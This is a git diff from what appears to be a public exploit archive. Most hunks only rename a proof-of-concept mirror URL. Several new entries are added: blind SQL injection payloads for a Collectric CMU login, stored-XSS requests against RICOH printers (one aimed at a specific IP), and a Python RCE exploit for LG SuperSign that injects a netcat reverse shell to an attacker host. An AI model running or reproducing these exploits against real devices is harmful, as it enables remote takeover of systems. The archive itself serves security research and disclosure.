a/exploits/hardware/remote/8269.txt +++ b/exploits/hardware/remote/8269.txt @@ -197,7 +197,7 @@ name="backdoor"> Proof-of-concept brute force tool available at http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8269.zip (2009-Louhi_CMC-brute_090323.zip) Other information: diff --git a/exploits/hardware/webapps/11101.txt b/exploits/hardware/webapps/11101.txt index 1056fdeb8..fe31f924b 100644 --- a/exploits/hardware/webapps/11101.txt +++ b/exploits/hardware/webapps/11101.txt @@ -16,4 +16,4 @@ firmware versions have been confirmed to date: Detailed description available here: http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf -POC code available here: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file +POC code available here: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz (hnap0wn.tar.gz) \ No newline at end of file diff --git a/exploits/hardware/webapps/12092.txt b/exploits/hardware/webapps/12092.txt index 6bda31452..06f0f40a8 100644 --- a/exploits/hardware/webapps/12092.txt +++ b/exploits/hardware/webapps/12092.txt @@ -17,4 +17,4 @@ because the application fails to sanitize user-supplied input. The vulnerabiliti logged-in user. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/12092.pdf (cybsec_advisory_2010_0402.pdf) \ No newline at end of file diff --git a/exploits/hardware/webapps/29959.txt b/exploits/hardware/webapps/29959.txt index 92be8715b..3709fc9e9 100644 --- a/exploits/hardware/webapps/29959.txt +++ b/exploits/hardware/webapps/29959.txt @@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com Root-Node -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29959.nse \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29959.nse \ No newline at end of file diff --git a/exploits/hardware/webapps/34254.txt b/exploits/hardware/webapps/34254.txt index 2350397b4..b3f5d41c7 100644 --- a/exploits/hardware/webapps/34254.txt +++ b/exploits/hardware/webapps/34254.txt @@ -7,7 +7,7 @@ # Tested on: TP-Link TL-WR740N v4 Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34254.7z (Password: TP-P0wned-Link) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34254.7z (Password: TP-P0wned-Link) Vulnerability description: The domain name parameters of the "Parental Control" and "Access diff --git a/exploits/hardware/webapps/40276.txt b/exploits/hardware/webapps/40276.txt index 73f218219..d7615447a 100644 --- a/exploits/hardware/webapps/40276.txt +++ b/exploits/hardware/webapps/40276.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40276.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40276.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/40690.txt b/exploits/hardware/webapps/40690.txt index b40932b21..b34cc37be 100644 --- a/exploits/hardware/webapps/40690.txt +++ b/exploits/hardware/webapps/40690.txt @@ -81,4 +81,4 @@ Have had no further contact with them, unable to get a CVE assigned for this, pr Full Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40690.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40690.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/45446.txt b/exploits/hardware/webapps/45446.txt new file mode 100644 index 000000000..7528a8932 --- /dev/null +++ b/exploits/hardware/webapps/45446.txt @@ -0,0 +1,23 @@ +# Exploit Title: Collectric CMU 1.0 - 'lang' SQL injection +# Google Dork: "Inloggning Collectric CMU" +# Discoverer: Simon Brannstrom +# Date: 2018-09-15 +# Vendor Homepage: http://ourenergy.se/ +# Software Link: n/a +# Version: All known versions +# Tested on: Linux +# CVE: N/A +# About: Collectric CMU is a Swedish made controller device for electrical devices such as car heaters, +# camping sites etc, powered by a NGW board running Linux 2.6.30 with a PHP admin interface. +# More vulnerabilities exists, see my other vulnerability reports. + +# Parameter: lang (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause + +Payload: username=yUqg&lang=SWEDISH' AND 1320=1320 AND 'EXAr'='EXAr&password=zhdY&setcookie=setcookie&submit=Logga in + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind + +Payload: username=yUqg&lang=SWEDISH' AND SLEEP(5) AND 'kglV'='kglV&password=zhdY&setcookie=setcookie&submit=Logga in \ No newline at end of file diff --git a/exploits/hardware/webapps/45448.py b/exploits/hardware/webapps/45448.py new file mode 100755 index 000000000..a2458ff3a --- /dev/null +++ b/exploits/hardware/webapps/45448.py @@ -0,0 +1,36 @@ +# Exploit Title: LG SuperSign EZ CMS 2.5 - Remote Code Execution +# Date: 2018-09-18 +# Exploit Author: Alejandro Fanjul +# Vendor Homepage:https://www.lg.com +# Software Link: https://www.lg.com/ar/software-lg-supersign +# Version: SuperSignEZ 1.3 +# Tested on: LG WebOS 3.10 +# CVE : CVE-2018-17173 + +# 1. Description +# LG SuperSignEZ CMS, that many LG SuperSign TVs have built in, is prone +# to remote code execution due to an improper parameter handling + +# 2. Proof of concept +# Code to exploit the vulnerability + +import requests +from argparse import ArgumentParser + +parser = ArgumentParser(description="SuperSign RCE") +parser.add_argument("-t", "--target", dest="target", + help="Target") +parser.add_argument("-l", "--lhost", dest="lhost", + help="lhost") +parser.add_argument("-p", "--lport", dest="lport", + help="lport") + +args = parser.parse_args() + +#LG SupersignEZ always run in port 9080, so in target you must type: #LG_SuperSign_IP:9080 +#Example +#supersign-exploit.py -t LG_SuperSign_IP:9080 -l attacker_ip -p 4444 +#In the attacker machine wait for the shell with nc -lvp 4444 +#enjoy your shell + +s = requests.get('[http://'+](http://%27+/) str(args.target).replace('\n', '') +'/qsr_server/device/getThumbnail?sourceUri=\'%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20'+str(args.lhost)+'%20'+str(args.lport)+'%20%3E%2Ftmp%2Ff;\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150') \ No newline at end of file diff --git a/exploits/hardware/webapps/45454.txt b/exploits/hardware/webapps/45454.txt new file mode 100644 index 000000000..eec8b0560 --- /dev/null +++ b/exploits/hardware/webapps/45454.txt @@ -0,0 +1,31 @@ +# Exploit Title: RICOH Aficio MP 301 Printer - Cross-Site Scripting +# Date: 2018-09-21 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.ricoh.com/ +# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-301spf-black-and-white-laser-multifunction-printer/_/R-416185 +# Software: RICOH Printer +# Product Version: Aficio MP 301 +# Vulernability Type: Code Injection +# Vulenrability: HTML Injection and Stored XSS +# CVE: N/A + +# On the RICOH Aficio MP 301 printer, HTML Injection and Stored XSS vulnerabilities have been +# discovered in the area of adding addresses via the entryNameIn parameter +# to /web/entry/en/address/adrsSetUserWizard.cgi. + +# HTTP POST Request : + +POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 +Host: 138.100.78.33 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: text/plain, */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://138.100.78.33/web/entry/en/address/adrsList.cgi +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 192 +Cookie: risessionid=082172179372966; cookieOnOffChecker=on; wimsesid=163487735 +Connection: close + +mode=ADDUSER&step=BASE&wimToken=507435387&entryIndexIn=00038&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 \ No newline at end of file diff --git a/exploits/hardware/webapps/45460.txt b/exploits/hardware/webapps/45460.txt new file mode 100644 index 000000000..f7ba71389 --- /dev/null +++ b/exploits/hardware/webapps/45460.txt @@ -0,0 +1,31 @@ +# Exploit Title: RICOH MP C6003 Printer - Cross-Site Scripting +# Date: 2018-09-21 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.ricoh.com/ +# Hardware Link: https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c6003-color-laser-multifunction-printer/_/R-416534 +# Software: RICOH Printer +# Product Version: MP C6003 +# Vulernability Type: Code Injection +# Vulenrability: HTML Injection and Stored XSS +# CVE: N/A + +# On the RICOH MP C6003 printer, HTML Injection and Stored XSS vulnerabilities have been +# discovered in the area of adding addresses via the entryNameIn parameter +# to /web/entry/en/address/adrsSetUserWizard.cgi. + +# HTTP POST Request : + +POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: text/plain, */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/web/entry/en/address/adrsList.cgi +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 191 +Cookie: risessionid=136092287407915; cookieOnOffChecker=on; wimsesid=201698077 +Connection: close + +mode=ADDUSER&step=BASE&wimToken=71325138&entryIndexIn=00031&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 \ No newline at end of file diff --git a/exploits/ios/dos/39359.txt b/exploits/ios/dos/39359.txt index a767c68ea..625e017e8 100644 --- a/exploits/ios/dos/39359.txt +++ b/exploits/ios/dos/39359.txt @@ -6,4 +6,4 @@ OS X advisory: https://support.apple.com/en-us/HT205731 iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39359.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39359.zip \ No newline at end of file diff --git a/exploits/ios/dos/39360.txt b/exploits/ios/dos/39360.txt index 6745152f3..52d320200 100644 --- a/exploits/ios/dos/39360.txt +++ b/exploits/ios/dos/39360.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39360.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39360.zip \ No newline at end of file diff --git a/exploits/ios/dos/39361.txt b/exploits/ios/dos/39361.txt index 16e6a541e..8d64bb2fc 100644 --- a/exploits/ios/dos/39361.txt +++ b/exploits/ios/dos/39361.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39361.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39361.zip \ No newline at end of file diff --git a/exploits/ios/dos/39362.txt b/exploits/ios/dos/39362.txt index 312663099..22bb37d1f 100644 --- a/exploits/ios/dos/39362.txt +++ b/exploits/ios/dos/39362.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39362.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39362.zip \ No newline at end of file diff --git a/exploits/ios/dos/39363.txt b/exploits/ios/dos/39363.txt index 82565db54..d7adfd42b 100644 --- a/exploits/ios/dos/39363.txt +++ b/exploits/ios/dos/39363.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39363.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39363.zip \ No newline at end of file diff --git a/exploits/ios/dos/39364.txt b/exploits/ios/dos/39364.txt index f8cfdbf2e..194645924 100644 --- a/exploits/ios/dos/39364.txt +++ b/exploits/ios/dos/39364.txt @@ -7,4 +7,4 @@ iOS advisory: https://support.apple.com/en-us/HT205732 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39364.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39364.zip \ No newline at end of file diff --git a/exploits/ios/dos/40906.txt b/exploits/ios/dos/40906.txt index ad4bfa835..dfbe79567 100644 --- a/exploits/ios/dos/40906.txt +++ b/exploits/ios/dos/40906.txt @@ -109,7 +109,7 @@ or https://cert.cx/appleios10/expl.html just click on this link by using Safari. EDB Proofs of Concept Mirror: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40906.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40906.zip -------------------------------------------------------------------------------------- 5. Safari and sandbox diff --git a/exploits/ios/dos/42014.txt b/exploits/ios/dos/42014.txt index 8bc85747a..fb76670c9 100644 --- a/exploits/ios/dos/42014.txt +++ b/exploits/ios/dos/42014.txt @@ -131,4 +131,4 @@ localNotification.soundName = UILocalNotificationDefaultSoundName; Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42014.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42014.zip \ No newline at end of file diff --git a/exploits/ios/local/14538.txt b/exploits/ios/local/14538.txt index f2f0888cc..60a1eab70 100644 --- a/exploits/ios/local/14538.txt +++ b/exploits/ios/local/14538.txt @@ -1,3 +1,3 @@ The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14538.7z (ios_pdf_exploit.7z) \ No newline at end of file diff --git a/exploits/ios/local/42555.txt b/exploits/ios/local/42555.txt index 6808590f3..c930c5f63 100644 --- a/exploits/ios/local/42555.txt +++ b/exploits/ios/local/42555.txt @@ -35,4 +35,4 @@ Credit for finding the vulnerabilities, chaining them together, writing the expl Proof of Concept: https://github.com/doadam/ziVA -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42555.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42555.zip \ No newline at end of file diff --git a/exploits/ios/remote/28081.txt b/exploits/ios/remote/28081.txt index 2aa19e05e..f2f234772 100644 --- a/exploits/ios/remote/28081.txt +++ b/exploits/ios/remote/28081.txt @@ -54,7 +54,7 @@ into the JS code). The full exploit code is available here: http://packetstormsecurity.com/files/123088/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28081.tgz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28081.tgz +------------------------------------------------------------------------------+ diff --git a/exploits/ios/remote/42784.txt b/exploits/ios/remote/42784.txt index e821865e9..83c929c59 100644 --- a/exploits/ios/remote/42784.txt +++ b/exploits/ios/remote/42784.txt @@ -32,4 +32,4 @@ Following the steps above should result in installation of a simple backdoor all Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42784.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42784.zip \ No newline at end of file diff --git a/exploits/ios/remote/42996.txt b/exploits/ios/remote/42996.txt index 6be363301..e1fc815e3 100644 --- a/exploits/ios/remote/42996.txt +++ b/exploits/ios/remote/42996.txt @@ -33,4 +33,4 @@ Following the steps above should result in DART's descriptor being mapped into I Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42996.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42996.zip \ No newline at end of file diff --git a/exploits/ios/remote/4522.html b/exploits/ios/remote/4522.html index bcea9e050..22f5d6dd4 100644 --- a/exploits/ios/remote/4522.html +++ b/exploits/ios/remote/4522.html @@ -27,7 +27,7 @@ EDB Note: Old filename: 10112007-iphone.tif --> - + # milw0rm.com [2007-10-11] \ No newline at end of file diff --git a/exploits/java/dos/41965.txt b/exploits/java/dos/41965.txt index d9b23594e..b7c9f2eb3 100644 --- a/exploits/java/dos/41965.txt +++ b/exploits/java/dos/41965.txt @@ -21,4 +21,4 @@ The second step is to change python script jenkins_poc1.py: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41965.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41965.zip \ No newline at end of file diff --git a/exploits/java/remote/30502.txt b/exploits/java/remote/30502.txt index 5427b93e9..3cd1ba475 100644 --- a/exploits/java/remote/30502.txt +++ b/exploits/java/remote/30502.txt @@ -4,4 +4,4 @@ The Sun Java Runtime Environment is prone to a remote privilege-escalation vulne An attacker can exploit this issue to execute arbitrary code within the context of the user who invoked the Java applet. Successfully exploiting this issue may result in the remote compromise of affected computers. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30502.tti \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30502.tti \ No newline at end of file diff --git a/exploits/java/remote/39007.txt b/exploits/java/remote/39007.txt index 3b892f966..2cec939e8 100644 --- a/exploits/java/remote/39007.txt +++ b/exploits/java/remote/39007.txt @@ -66,4 +66,4 @@ The Jasmin file we used is attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39007.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39007.zip \ No newline at end of file diff --git a/exploits/java/remote/39854.txt b/exploits/java/remote/39854.txt index ff392fa90..744904fb3 100644 --- a/exploits/java/remote/39854.txt +++ b/exploits/java/remote/39854.txt @@ -55,7 +55,7 @@ Proof of concept: A simple PoC can be found here: https://github.com/h0ng10/powerfolder-exploit-poc -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39854.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39854.zip Disclosure timeline: ---------------------------------------------------------------------- diff --git a/exploits/java/webapps/40817.txt b/exploits/java/webapps/40817.txt index 6ddaa712d..3274c2371 100644 --- a/exploits/java/webapps/40817.txt +++ b/exploits/java/webapps/40817.txt @@ -90,7 +90,7 @@ The vulnerability allows remote attackers to permanently embed arbitrary script 7. POC =========== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40817.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40817.zip 8. SOLUTION =========== diff --git a/exploits/java/webapps/40842.txt b/exploits/java/webapps/40842.txt index a2fa728ed..670c16934 100644 --- a/exploits/java/webapps/40842.txt +++ b/exploits/java/webapps/40842.txt @@ -62,7 +62,7 @@ support and JBoss EAP 5 is close to the end of its maintenance period. See jboss_payload.zip (40842.zip) and Example Attack Session above. http://lab.mediaservice.net/code/jboss_payload.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40842.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40842.zip 6. Timeline @@ -74,4 +74,4 @@ Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40842.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40842.zip \ No newline at end of file diff --git a/exploits/linux/dos/10203.txt b/exploits/linux/dos/10203.txt index 3a3f293ca..205fe4fe3 100644 --- a/exploits/linux/dos/10203.txt +++ b/exploits/linux/dos/10203.txt @@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions. NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable. -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10203.tar.bz2 (2009-11-22-bibtex-crash.tar.bz2) \ No newline at end of file diff --git a/exploits/linux/dos/10206.txt b/exploits/linux/dos/10206.txt index 8f9f034e2..feb8ddbc7 100644 --- a/exploits/linux/dos/10206.txt +++ b/exploits/linux/dos/10206.txt @@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi Expat 2.0.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10206-1.gz (2009-11-22-36097.gz) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10206-2.gz (2009-11-22-36097-2.gz) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10206-1.gz (2009-11-22-36097.gz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10206-2.gz (2009-11-22-36097-2.gz) \ No newline at end of file diff --git a/exploits/linux/dos/14573.txt b/exploits/linux/dos/14573.txt index 0b708a908..6ae4d3d8e 100644 --- a/exploits/linux/dos/14573.txt +++ b/exploits/linux/dos/14573.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera Versions up to and including libTIFF 3.9.4 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14573.tif.gz (lp589145-sample.tif.gz) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14573.tif.gz (lp589145-sample.tif.gz) \ No newline at end of file diff --git a/exploits/linux/dos/18295.txt b/exploits/linux/dos/18295.txt index cbb7759b3..81f033211 100644 --- a/exploits/linux/dos/18295.txt +++ b/exploits/linux/dos/18295.txt @@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki -- http://pi3.com.pl -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18295.c (p_cve-2011-4362.c) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18295.c (p_cve-2011-4362.c) http://blog.pi3.com.pl/?p=277 \ No newline at end of file diff --git a/exploits/linux/dos/23427.txt b/exploits/linux/dos/23427.txt index 159dc6cb7..56e7d58c4 100644 --- a/exploits/linux/dos/23427.txt +++ b/exploits/linux/dos/23427.txt @@ -52,4 +52,4 @@ si_addr:$2 = (void *) 0xaf625080 Proof of concept included. http://www41.zippyshare.com/v/13083235/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23427.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23427.rar \ No newline at end of file diff --git a/exploits/linux/dos/23757.txt b/exploits/linux/dos/23757.txt index d083c5539..532921cae 100644 --- a/exploits/linux/dos/23757.txt +++ b/exploits/linux/dos/23757.txt @@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a remote denial of service Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23757.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23757.zip \ No newline at end of file diff --git a/exploits/linux/dos/24815.txt b/exploits/linux/dos/24815.txt index 221c8286a..8a4ecf980 100644 --- a/exploits/linux/dos/24815.txt +++ b/exploits/linux/dos/24815.txt @@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerab Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24815.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24815.zip \ No newline at end of file diff --git a/exploits/linux/dos/24865.txt b/exploits/linux/dos/24865.txt index 0a77bd68e..da40fa3f8 100644 --- a/exploits/linux/dos/24865.txt +++ b/exploits/linux/dos/24865.txt @@ -10,7 +10,7 @@ Sorry I forgot to write headers in previous mail. # Tested on: [GNU/Linux] # CVE : [CVE-2012-1663] -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24865.tar.bz2 +PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24865.tar.bz2 I'm glad to share this to you guys. The test code was attached. You also could find them here: diff --git a/exploits/linux/dos/27762.txt b/exploits/linux/dos/27762.txt index 523ffa91f..c218272c8 100644 --- a/exploits/linux/dos/27762.txt +++ b/exploits/linux/dos/27762.txt @@ -4,8 +4,8 @@ LibTIFF is affected by multiple denial-of-service vulnerabilities. An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27762-1.tiff.0 +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27762-1.tiff.0 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27762-2.tiff.1 +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27762-2.tiff.1 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27762-3.tiff.100 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27762-3.tiff.100 \ No newline at end of file diff --git a/exploits/linux/dos/27764.txt b/exploits/linux/dos/27764.txt index f2337b5ac..662f5d11e 100644 --- a/exploits/linux/dos/27764.txt +++ b/exploits/linux/dos/27764.txt @@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to an integer-overflow vulnerab An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27764.tiff.11 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27764.tiff.11 \ No newline at end of file diff --git a/exploits/linux/dos/27765.txt b/exploits/linux/dos/27765.txt index 18e6d0ec2..b64a5ba4f 100644 --- a/exploits/linux/dos/27765.txt +++ b/exploits/linux/dos/27765.txt @@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to a double-free vulnerability; Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27765.tiff.2 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27765.tiff.2 \ No newline at end of file diff --git a/exploits/linux/dos/27925.txt b/exploits/linux/dos/27925.txt index 61ab83973..6759e2a5b 100644 --- a/exploits/linux/dos/27925.txt +++ b/exploits/linux/dos/27925.txt @@ -6,4 +6,4 @@ This vulnerability allows local users to cause a kernel panic, denying further s This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27925.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27925.tgz \ No newline at end of file diff --git a/exploits/linux/dos/28348.txt b/exploits/linux/dos/28348.txt index c3145d081..a43c3ef0a 100644 --- a/exploits/linux/dos/28348.txt +++ b/exploits/linux/dos/28348.txt @@ -8,4 +8,4 @@ Exploiting this issue could allow attacker-supplied machine code to execute in t ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28348.exe \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28348.exe \ No newline at end of file diff --git a/exploits/linux/dos/28358.txt b/exploits/linux/dos/28358.txt index 40fcd0e67..d44e5b1b3 100644 --- a/exploits/linux/dos/28358.txt +++ b/exploits/linux/dos/28358.txt @@ -6,4 +6,4 @@ Remote attackers may trigger this issue by sending crafted UDP datagrams to affe Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28358.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28358.tar.gz \ No newline at end of file diff --git a/exploits/linux/dos/28367.txt 